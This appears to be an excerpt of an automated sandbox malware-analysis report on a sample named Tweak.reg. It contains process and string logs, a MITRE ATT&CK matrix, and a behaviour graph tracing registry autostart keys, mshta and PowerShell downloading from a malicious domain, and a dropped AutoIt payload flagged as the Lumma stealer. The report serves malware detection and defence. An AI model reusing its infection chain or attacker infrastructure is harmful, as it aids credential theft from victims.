      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001E8C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,15_2_001E8C58
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001B59C7 GetUserNameW,15_2_001B59C7
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001AB99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_001AB99F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0018310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0018310D
      Source: AutoIt3.exeBinary or memory string: WIN_81
      Source: AutoIt3.exeBinary or memory string: WIN_XP
      Source: AutoIt3.exeBinary or memory string: WIN_XPe
      Source: AutoIt3.exeBinary or memory string: WIN_VISTA
      Source: AutoIt3.exeBinary or memory string: WIN_7
      Source: AutoIt3.exe.7.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: AutoIt3.exeBinary or memory string: WIN_8
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001F23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_001F23E0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001F1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,15_2_001F1DD8

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure2
      Valid Accounts      		1
      Native API      		1
      DLL Side-Loading      		1
      Exploitation for Privilege Escalation      		1
      Disable or Modify Tools      		21
      Input Capture      		2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		2
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts11
      Command and Scripting Interpreter      		1
      Create Account      		1
      DLL Side-Loading      		21
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop Protocol1
      Email Collection      		11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts4
      PowerShell      		2
      Valid Accounts      		2
      Valid Accounts      		2
      Obfuscated Files or Information      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin Shares21
      Input Capture      		2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCron21
      Registry Run Keys / Startup Folder      		21
      Access Token Manipulation      		1
      Timestomp      		NTDS66
      System Information Discovery      		Distributed Component Object Model3
      Clipboard Data      		13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
      Process Injection      		1
      DLL Side-Loading      		LSA Secrets31
      Security Software Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
      Registry Run Keys / Startup Folder      		21
      Masquerading      		Cached Domain Credentials31
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
      Valid Accounts      		DCSync3
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Modify Registry      		Proc Filesystem11
      Application Window Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
      Virtualization/Sandbox Evasion      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
      Access Token Manipulation      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
      Process Injection      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1486296 Sample: Tweak.reg Startdate: 01/08/2024 Architecture: WINDOWS Score: 100 51 pwsh2.pajamas-stoic-failing.lol 2->51 55 Malicious sample detected (through community Yara rule) 2->55 57 Yara detected Powershell download and execute 2->57 59 Encrypted powershell cmdline option found 2->59 61 3 other signatures 2->61 9 powershell.exe 11 2->9         started        12 powershell.exe 2->12         started        14 regedit.exe 1 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 69 Powershell drops PE file 9->69 19 mshta.exe 17 9->19         started        24 conhost.exe 9->24         started        26 mshta.exe 15 12->26         started        28 conhost.exe 12->28         started        71 Creates autostart registry keys with suspicious values (likely registry only malware) 14->71 73 Creates an autostart registry key pointing to binary in C:\Windows 14->73 49 127.0.0.1 unknown unknown 16->49 signatures6 process7 dnsIp8 53 pwsh2.pajamas-stoic-failing.lol 188.114.96.3, 443, 49730, 49738 CLOUDFLARENETUS European Union 19->53 45 C:\Users\user\AppData\Local\...\DonaldDuck[1], PE32 19->45 dropped 65 Suspicious powershell command line found 19->65 67 Very long command line found 19->67 30 powershell.exe 14 29 19->30         started        34 powershell.exe 26->34         started        file9 signatures10 process11 file12 47 C:\Users\user\AppData\Roaming\AutoIt3.exe, PE32 30->47 dropped 75 Loading BitLocker PowerShell Module 30->75 36 AutoIt3.exe 30->36         started        39 conhost.exe 30->39         started        41 AutoIt3.exe 34->41         started        43 conhost.exe 34->43         started        signatures13 process14 signatures15 63 LummaC encrypted strings found 36->63

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.